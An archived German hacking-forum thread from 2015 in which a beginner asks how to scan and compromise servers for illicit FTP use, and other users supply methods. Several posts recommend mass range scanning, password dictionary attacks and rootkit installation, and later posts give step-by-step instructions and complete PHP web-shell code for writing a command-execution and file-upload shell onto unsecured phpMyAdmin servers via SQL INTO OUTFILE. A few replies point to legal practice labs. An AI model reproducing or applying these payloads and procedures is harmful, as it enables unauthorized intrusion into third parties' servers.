PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : (FTP) Richtig Scannen und Cracken - Str0s TuT



R@zz@R-LightS
28.07.2015, 09:33
Hallo liebe Gemeinde ich bin auf der suche nach einem TuT oder jemandem der mir die Thematik genau
erläutern kann ich benutze Windows etwas von Linux verstehe ich aber auch aber lieber halt Windows wenn möglich. Im Netz kann ich nicht viel finden.

Gruß RL

Cappa
28.07.2015, 09:50
Schreib dich nicht ab, lern lesen und schreiben

Teards
28.07.2015, 10:10
Schreib dich nicht ab, lern lesen und schreiben

Dabei ist es nicht verboten wenn man sich helfen lässt.
Habe bisher auch nichts sehr (für Anfänger) hilfreiches gefunden, hätte aber grundsätzlich auch Interesse an dem Thema.
Für Exploits (um die Server zu cracken) kann man z.B. hier (https://www.exploit-db.com/) vorbeischauen.

R@zz@R-LightS
28.07.2015, 10:43
Danke für den Link

Hakkep3t3r
28.07.2015, 12:59
Klick (http://www.elitepvpers.com/forum/coding-tutorials/957681-tutrial-ftp-hacken.html) und Klick (http://www.lobnan.de/ftp.htm)

Vielleicht hilft das weiter

Cappa
28.07.2015, 13:05
Dabei ist es nicht verboten wenn man sich helfen lässt.

Ich helfe gern, doch ich erwarte den Anstand, dass das Hilfegesuch nach bestem Wissen und Gewissen gestaltet/geschrieben wurde.

Hingerotzte Fragen erhalten von mir keine (ernstzunehmenden) Antworten.

Ja das ist OT aber ich wollte es ein für alle mal gesagt haben!

Teards
28.07.2015, 14:00
Ich helfe gern, doch ich erwarte den Anstand, dass das Hilfegesuch nach bestem Wissen und Gewissen gestaltet/geschrieben wurde.

Hingerotzte Fragen erhalten von mir keine (ernstzunehmenden) Antworten.

Ja das ist OT aber ich wollte es ein für alle mal gesagt haben!

In dem Punkt, dass die Frage sehr unspezifisch gestellt ist gebe ich dir absolut recht. Aber wenn ich das Gefühl habe eine Frage wurde einfach nur hingerotzt ohne sich ein wenig mit dem Thema auseinander zu setzten gebe ich meistens gar keine Antwort.

R@zz@R-LightS
28.07.2015, 15:45
Ich helfe gern, doch ich erwarte den Anstand, dass das Hilfegesuch nach bestem Wissen und Gewissen gestaltet/geschrieben wurde.

Hingerotzte Fragen erhalten von mir keine (ernstzunehmenden) Antworten.

Ja das ist OT aber ich wollte es ein für alle mal gesagt haben!


Ja irgendwo hast du ja recht.

- - - - - - - - - - Beitrag nachträglich erweitert - - - - - - - - - -

Ich bin schon eine zeit in der ftp - Scene aktiv ,jedoch bekommt man nur schlecht bis gar keine infos zu dem Thema.

Normale Pubs scannen hab ich mir so gut wie selber bei gebracht,aber das ist ja eigentlich auch nicht schwer.

Mein neues Projekt was ich zur zeit in angriff genommen habe ,ist es nach RDPs zu scannen und zu cracken.
Aber das mit denn Str0s interessiert mich mehr.

Und wie schon gesagt ich benutze win,und alt so viele gute Programme gibt es da glaub ich nicht oder ?

avarage
29.07.2015, 21:52
Gaengigste Methode fuer Anfaenger ist wohl immernoch phpmyadmin scannen und dann hoffen, dass dieser sploitbar ist. Dafuer mal nach pmascan.exe suche.
Ansonsten ist auch mssql nicht tot, suche doch mal nach xray (gui scanner) oder scan100/500/1000 (zahl gibt die threads an).
Effektiv laeuft es immer nach dem selben Schema ab, du schaust ob es ein remote code exploit gibt, dass du irgendwie ausfuehren kannst. Scannst die Ranges ab nach dem Port auf dem der sploitbare Service laeuft und laedst dann dort deine Files hoch (ftpd + rootkit) und sicherst im nachhinein die Maschine ab, um eventuelle Rehacks zu vermeiden.

Die Seiten die ich noch von frueher kenne, sind alle down.

R@zz@R-LightS
03.08.2015, 13:37
Ich komme leider immer noch nicht weiter, deswegen Push ich das ganze mal.

Hat den keiner ein wirklich gutes TuT ?, am besten mit Bildern und leicht erklärt System ist egal
hab mir auf meinem Lappi Linux Installiert !

Cappa
03.08.2015, 14:15
In dem Bereich sind bebilderte TuTs nicht gern gesehen. Wer es kann braucht keins zu schreiben und wer es nicht kann muss halt das Wissen erarbeiten. Die Scene ist da nicht so offen...

Wenn du nach einem SceneFTP Zugang fragst und den Siteadmin anschließend danach, wie du dein FlashFXP einrichtest und einen EntryBNC nutzt fliegst du mit Lichtgeschwindigkeit vom FTP.

avarage
03.08.2015, 15:12
Sogar Google spuckt mit dem Begriff "Stros hacken", zumindest fuer den Anfang brauchbare Tutorials aus. Ich verlinke mal nicht, aber es scheint nicht so, als haettest du wirklich Lust dich mit der Marterie ausseinanderzusetzen, etwas lesen gehoert schon dazu.

Raynor
04.08.2015, 00:58
Hat den keiner ein wirklich gutes TuT ?, am besten mit Bildern und leicht erklärt System ist egal
hab mir auf meinem Lappi Linux Installiert !

Wie willst du etwas hacken, wenn du nicht weißt wie die Materie funktioniert?
Weißt du, welche Standardports Protokolle wie FTP, SSH und HTTP verwenden?

Ein freundschaftlicher Tipp von mir! :)
Lerne wie es funktioniert. Du musst verstehen, was du eigentlich machst.
Wie funktioniert TCP/IP, wie funktioniert FTP und wieso verwendet man dieses s*eiß Protokoll nicht auf seinem Server.

Wie installiert und verwaltet man einen Server richtig. Was kann man dabei falsch machen.
Wenn du weißt wie es funktioniert, weißt du auch wo die Schwachstellen sein können.

Lies ein paar Tutorials über Linux und spiele ein wenig mit Wireshark herum. Dann hast du auch die Antwort auf deine Frage. :D


lg

R@zz@R-LightS
04.08.2015, 04:10
Das ein oder andere hab ich ja schon verstanden,und bin auch nicht auf dem Kopf gefallen, hab mich halt Jahre lang für was anderes interessiert.


Is nix besonderes aber das TuT ist von mir und wird noch erweitert,so in der Art wäre das schön.

--> https://mlcboard.com/forum/showthread.php?136980-W-Lan-Netzwerke-Hacken-unter-Windows-Linux-Android-%28-wep-wpa-wpa-2-wps-%29-AIO-RL

Ich hoffe das mit der Verlinkung is ok.

Ach und das klar hab ich das ganze schon Gegooglet ist aber schlecht erklärt und zum teil nicht mehr aktuell.

avarage
04.08.2015, 14:38
Es ist halt leichter auf konkrete Fragen auch Antworten zu bekommen.
Ich hab in all den Jahren nie bebilderte Anleitungen zum hacken gesehen. Wozu auch?
Ich denke, beim hacken geht es auch weniger darum, irgendwelche buttons richtig anzuklicken, als um dass man verstanden hat, was man tut und warum etwas funktioniert.
Und dazu wurden hier schon Tipps und Anregungen gegeben :)

Raynor
05.08.2015, 00:27
Das ein oder andere hab ich ja schon verstanden,und bin auch nicht auf dem Kopf gefallen, hab mich halt Jahre lang für was anderes interessiert.


Is nix besonderes aber das TuT ist von mir und wird noch erweitert,so in der Art wäre das schön.

--> https://mlcboard.com/forum/showthread.php?136980-W-Lan-Netzwerke-Hacken-unter-Windows-Linux-Android-%28-wep-wpa-wpa-2-wps-%29-AIO-RL

Ich hoffe das mit der Verlinkung is ok.

Ach und das klar hab ich das ganze schon Gegooglet ist aber schlecht erklärt und zum teil nicht mehr aktuell.

Dann sehe ich nicht, wo das Problem ist. Bitte stelle deine Frage etwas genauer.
Was daran verstehst du nicht und was willst du genau wissen?

IP-Ranges scannen, Dictionary-Attacks versuchen und öffentliche Exploits probieren ist ja jetzt nicht wirklich schwer.

Entweder du schreibst einen eigenen Scanner, der genau das macht was du willst, oder du verwendest einen öffentlichen.
Die gibt es wie Sand am Meer. Ob dieser jetzt nur Ports scannt oder auch Angriffe
probiert, hängt vom Scanner ab.

Die Ports welche du scannst sind halt die üblichen wie 21, 22, 80, 115 und 443.

Bei jeden Dienst, wo du dich einloggen kannst verwendest du eine Wordlist mit sagen wir mal, 100 Passwörtern. Bei Webservern kannst du ja den Shellshock Exploit versuchen.



Ich denke, beim hacken geht es auch weniger darum, irgendwelche buttons richtig anzuklicken, als um dass man verstanden hat, was man tut und warum etwas funktioniert.

Amen!
Es spricht nichts dagegen, fertige Programme zu verwenden.
Meistens ist es sogar die bessere Wahl, aber jeder sollte
wissen, wie die Programme funktionen, welche man verwendet.


lg

R@zz@R-LightS
05.08.2015, 13:04
ok für mich ist es wichtig zu wissen ,was brauche ich an Programmen ?

Klar ! Einen Scanner ,einen Bruter und ne gute Wort-List, ne Empfehlung wäre schon nett.

Ich hab jetzt von diversen Seiten so einige geladen .

Scanner

1.Angry IP Scanner v3.3.3
2.Grims Ping 1.7.2
3.VNC - scanner GUI v1.2
4.1337 admin page finder v5
5.DFind Scanner GUI
6.KSNOOP2 V0.21 WIN32

Sind die Programme ok,oder gibt es da bessere Alternativen ?

1.- 2. Sind zum Pubs Scannen Ok,finde da immer was !

Shiva
06.08.2015, 08:35
Wenn du mal die augen aufmachen würdest dann hättest du auf MLC schon längst nen scanny für pma gefunden :D
Aber der hellste scheinst du mir nicht zu sein^^

\\Du brauchst nichtmal den Ansatz von einer Wordlist oder einem Bruter um an nen unsec pma zu kommen. Deine lächerliche anleitung zum RDP Bruten ist auch fürn arsch.

Raynor
06.08.2015, 21:57
1.Angry IP Scanner v3.3.3


Steht manchmal in meinem Serverlogs. Von daher wohl ok.



Klar ! Einen Scanner ,einen Bruter und ne gute Wort-List, ne Empfehlung wäre schon nett.

Ich hab jetzt von diversen Seiten so einige geladen .

Von da nimmst du dir halt 100 heraus, welche du auf jeden Server probierst.
Index of /pub/wordlists/passwords (http://download.openwall.net/pub/wordlists/passwords/)

Hydra soll ziemlich gut sein für Dictionary Attacks.
THC Hydra – SecTools Top Network Security Tools (http://sectools.org/tool/hydra/)
https://www.thc.org/thc-hydra/

lg

R@zz@R-LightS
12.08.2015, 06:24
##UPDATE##

So nach etwa 30 - 40 TuTs und weiteren Infos kann ich folgendes sagen !

Um nach den entsprechenden Ports zu Scannen nehme ich : DFind Scanner GUI 1.0

https://www.szenebox.org/images/_imported/2015/08/9.jpg

der schmeißt mir gute logs aus ,so das man ohne Probleme weiter arbeiten kann.

Um zb. jetzt nach Pubs zu suchen ,benutze ich jetzt neuerdings KSnoop ist auf jeden Fall die bessere alternative zu Grims Ping und haut auch gleichzeitig gute Speed Tests raus.

Des weiteren benutze ich Pmascan ,da habe ich aber bis jetzt noch keinen Erfolg mit gehabt.

Und da hört es bei mir dann auch schon auf,wie geht es weiter wenn ich einen pma_unsecured server
gefunden habe ? Wie bekomme ich Server-u und ne shell auf dem Server,wo bekomme ich chells her?

Ich hab jetzt auch einen Scan-Str0 aber auch da komme ich noch nicht klar ,bekomme da nix zum laufen.

----> Site exec HideRun.exe PMAscan.exe -path path.txt -file Dfind.txt

Bekomme immer den Fehler error 3.

Paradoxium
12.08.2015, 08:33
Yakzua112 hat vor langer Zeit zum Thema "PMA-Shell" einen hilfreichen Beitrag auf seinen Blog gepackt...



Benötigt:
• Ein Result in dieser Form:
“http://123.123.123.123/phpMyAdmin/index.php – UNIX – 244ms – /home/aaronber/www/htdocs/mysql/libraries/“
• Browser (und Internet^^)
• Code einer Shell

Interpretieren des Results:
• http://123.123.123.123/phpMyAdmin/index.php –> die Adresse zum connecten
• UNIX –> Auf dem Server laufendes System
• 244ms –> Zeit die der Server für eine Antwort brauchte
• /home/aaronber/www/htdocs/mysql/libraries/  ein Beispiel für einen Pfad auf dem man genügend Rechte hat

Vorgang:
1.) Wir connecten mit dem Browser auf http://123.123.123.123/phpMyAdmin/index.php
2.) Wir erstellen eine neue Datenbank mit dem Namen (z.B) „test“
3.) In dieser Datenbank erstellen wir eine Tabelle mit dem Namen (z.B) „test“ und mit einem Feld
4.) Dann benennen wir das Feld mit „test“; Unter Typ stellen wir text ein, den Rest kann man so lassen –> Speichern
5.) Dann markieren wir diese Feld und drücken auf „Einfügen“
6.) Dort fügen wir dann den Code unserer Shell ein. Hier ein Beispiel für eine c99-shell c99-shell
7.) Dann gehen wir auf SQL
8.) Dort fügen wir folgenden Befehl ein:

Code:
SELECT * FROM ‚test‘ INTO OUTFILE ‚/home/aaronber/www/htdocs/mysql/libraries/shell.php‘



Quelle: blog.yakuza112.org (http://blog.yakuza112.org)

R@zz@R-LightS
12.08.2015, 14:13
Mahlzeit Paradoxium !

Ich verstehe den Vorgang nicht ganz,ich bin absoluter Neuling was das angeht !

1.) Ich connecte auf.

https://www.szenebox.org/images/_imported/2015/08/13.jpg

2.) Meinst du mit Datenbank eine .txt Datei erstellen ?

Kann dir nicht ganz folgen,oder vielmehr verstehe den Ablauf nicht ganz !

jbs
12.08.2015, 16:21
Du musst in phpMyAdmin reinkommen. Dafür brauchst du entweder gültige Zugangsdaten oder einen Exploit dafür (bzw. für einen Service/eine Anwendung des Servers).
Sobald du in phpMyAdmin dann drin bist, kannst du diverse SQL Befehle ausführen, die dir dann weiteren Zugriff geben sollten (siehe Anleitung von yakuza). Der Rest ist dann dir überlassen.

Eine der gängigsten Shells ist die C99. Steinalt aber immer noch im Umlauf.

avarage
12.08.2015, 18:28
Vielleicht solltest du dir lokal mal einen xampp oder lampp server aufsetzen und ausprobieren, wie du in dein eigenes system kommen wuerdest.
Das hilft ungemein um ueberhaupt zu verstehen, wie der ganze Ablauf von statten geht und was phpmyadmin eigentlich macht.
Ausserdem solltest du, wenn du scannst, dir vorher eine viel versprechende Range raussuchen, dazu hilft ein IP-Index (http://ipindex.dihe.de/).
Dialup Ranges, werden selten einen phpmyadmin oder sonstige Serveranwendung am laufen haben, Hoster hingegen schon.

Viel Glueck.

Wellenreiter
15.08.2015, 13:37
Uhi.... ganz lustig die Unterhaltung hier.

Sorry aber google hilft dir in allem. In Klausuren, Beziehungsproblem und genauso beim Hacken.
Beim schnellen überfliegen hier, sind einige Begriffe gefallen, mit denen man schon einen Stro bauen könnte.

Wenn du mit einer besonderen Idee Millionär geworden bist, würdest du deinen Trick anderen weiter geben, wodurch du dann weniger von hättest?
Ne. Somit wird dir bestimmt kein Hacker ein tut oder am besten noch ein video geben. Oder sehe ich das falsch??
Zudem sollte man nicht vergessen, dass du in fremde System eindringst, hoffentlich gibt es bei dir das Thema Sicherheit.

Naja trotzdem viel erfolg bei der Suche.

Wellenreiter

Shiva
16.08.2015, 04:04
Der Junge schafft es nichtmal im Pub Scanner (Ksnoop) die Ranges zu editieren^^
Also Moderator des Boards würde ich den Thread dicht machen.

Unlimiter
16.08.2015, 05:35
Da man hier eine Schwäche bei den Grundlagen sieht, gibt es jetzt erst einmal ein paar Links die zur Informationsgewinnung und Einführung:


Welcome to SecurityTube.net (http://www.securitytube.net/)
https://www.vulnhub.com/
Learn Penetration Testing (http://www.guru99.com/learn-penetration-testing.html)


Ich weiß auch nicht nach welchem Suchbegriff du googlest, aber anstatt Eingaben wie "Hacking" zu verwenden, solltest du auf den Suchbegriff "penetration-testing" umsteigen.

Ansonsten kann man dir nicht wirklich mehr Tipps geben, denn wie schon vor einigen Posts angemerkt, musst du dich zuerst mit dem Thema Systemsicherheit auseinandersetzen, um den Ablauf und mögliche Schwachstellen nachvollziehen zu können.

Nebenbei gibt es auch viele Beispiel-Isos mit diversen Szenarien, welche du zusätzlich in einen VM-Player einbinden kannst, um dein neues Wissen auch praktisch und nicht nur theoretisch anwenden zu können.

LD
16.08.2015, 12:19
ist das sowas?
Anleitung - Scannen leicht gemacht - Freesoft-Board (http://www.freesoft-board.to/f238/anleitung-scannen-leicht-gemacht-32407.html)

knusi
18.09.2015, 07:59
das beste ist am anfang, du baust dir mal eine vm und installierst da xampp.
so kannst du dich lokal an pma rantasten.

einmal drin lege ich dir folgende befehle ans herz:
SELECT sowie INTO OUTFILE
am ende das nicht vergessen, zwecks etwaigen fehlern:
; --

wirkliche tuts wirst du aber nicht finden, erst recht nicht bebildert. grundwissen musst du dir selbst anlesen und wenn man dir in 5min eine lücke erklären kann, wie man schnell reinkommt, dann nimmt sich jemand auch die zeit - niemand wird dir aber ein tut verfassen oder sich eine stunde mit dir hinsetzen und standardlücken erklären.

ich würde jetzt übrigens nicht unbedingt lokal scannen.

R@zz@R-LightS
23.09.2015, 18:32
Hi Knus !

Erst einmal, scanne über´n str0

ach und shiva kann man nicht ernst nehmen ,weist ja wie er ist.

Also ich hab vor ein paar Wochen von Monk ein PMA - scann Paket bekommen,das ist bis jetzt das beste

als alles andere vorher was ich gefunden habe.Komme damit auch klar nur hab leider noch nix gefunden...

BUSTER
23.09.2015, 20:47
Tool,die ihr braucht
Browser
Shell
Scannz

Also, zuerst scannt ihr.Tut gepostet
Die Results sehen dann z.B. so aus:

129.120.43.132 HTTP Request FOUND (200 OK)

Wenn ihr einen solchen scan habt geht ihr auf:

http:\\129.120.43.132\phpmyadmin\phpinfo.php

Dort guckt ihr erstmal ob das System Windows NT hat.
Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
Kopiert dort den Pfad der dort steht.

Das Document_Root tragt ihr dann in die Shell hier ein:


code:

INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
FLUSH LOGS


Dann geht ihr auf:
http:\\129.120.43.132\phpmyadmin\index.php

Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:

CREATE TABLE shell (text text);

Ihr habt dann eine Table erstellt die shell heißt.
Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
Shell ein.

Wenn der Befehl erfolgreich war geht auf:

http:\\129.120.43.132\shell.php

Dort befindet sich eine cmd zeile.
Dann könnt ihr den Server ganz normal hacken wie bei MSSQL





+++++++++++++++++++++++++++++++++++++++++++



Hacken ist gefährlich und man sollte es nur mit bedacht tun !
Hacken ist strafbar und man sollte sich nicht erwischen lassen !
Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben ;P !

++++++++++++++++++++++++++++++++++++++++++++++++

knusi
24.09.2015, 10:44
wozu die datenbank, buster?
es gibt doch auch server da hat man kein recht, eine db anzulegen - brauchst du ja auch nicht.

es reicht, wenn du dir bei /pma/sql.php über select @@datadir oder select @@basedir das docroot anzeigen lässt und dann
SELECT SHELLCODE INTO OUTFILE '/var/www/shell.php' ; --
eingibst. bzw dann das docroot aus dem entsprechenden fall. das anlegen einer datenbank ist in keinem fall notwendig und wenn, kann man dies auch in einem schritt machen:


CREATE DATABASE ficker;
use ficker;
CREATE TABLE shell (codetab text);

INSERT INTO shell(codetab) VALUES ('Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\\\\\\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>Got Shell?</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html>
');
SELECT * INTO OUTFILE '/var/www/shell.php'FROM shell;
FLUSH LOGS ;
DROP DATABASE `ficker`


bin eher so das bequeme scriptkiddie :D

TrickyDicky
01.10.2015, 18:54
da wir hier ja mittlerweile bei pma angekommen sind, was gerade am anfang das sinnigste wäre, meines wissens nach, ist lesen dein bester freund; und nicht irgendwelche tut`s zum thema hacking sondern erstmal die grundlagen. klein anfangen bring einen oftmals weiter, auch wenns länger dauert. ohne das wissen, was ist sql und was tu ich damit, wirst du keinen echten einstieg finden. alles was du dann findest wir nur cryptisches gelaber sein bei dem du nur bahnhof verstehst. daher kauf dir ein paar bücher (ja wirklich kaufen) mit denen du lernen kannst wie eine datenbak aufgebaut ist und man sie erstellt/verwaltet.
aber auch das ist vielleicht schon ein schritt zuviel am anfang für dich.
was du sagtest mit dem linux auf deinem laptop ist ein sehr guter anfang. aber auch da solltest du den desktop erstmal abschalten und das system nur über die kommandozeile benutzen / verwalten. denn klickibunti wirst du in den meisten standart tools nicht finden die es gibt, und wenn du da schon vor einem unüberwindbaren hinderniss stehst ..... ja. dann hast eben ein problem und musst wieder fragen stellen, die man sich selbst beantworten/erarbeiten sollte, um auch zu zeigen das man es wirklich lernen will; und nicht nur 3 klicks machen will zum stro.
das gui baust du dir dann irgenwann selber für die bestehenden tools oder schreibst vielleicht sogar deine eigenen, für die du am ende auch nen gui baust.
und glaub mir, diese tools wirst du auch nicht einfach verschenken an jeden der einfach mal danach fragt.

bitte nicht falsch verstehn, ich denke schon das du lernen willst, aber der ansatz ist an der falschen stelle. ich selber bin auch nicht sehr viel weiter als du, aber ich habe gelernt, dass man sich dieses wissen nich in ein paar nächten durch tut's lesen aneignen kann ohne das nötige hintergrund wissen.
lange rede, kurzer sinn: hoffe du findest deinen weg, nur nimm keine abkürzungen, die werfen dich mehr zurück als das sie dich nach vorne bringen ;)

so long
trickydicky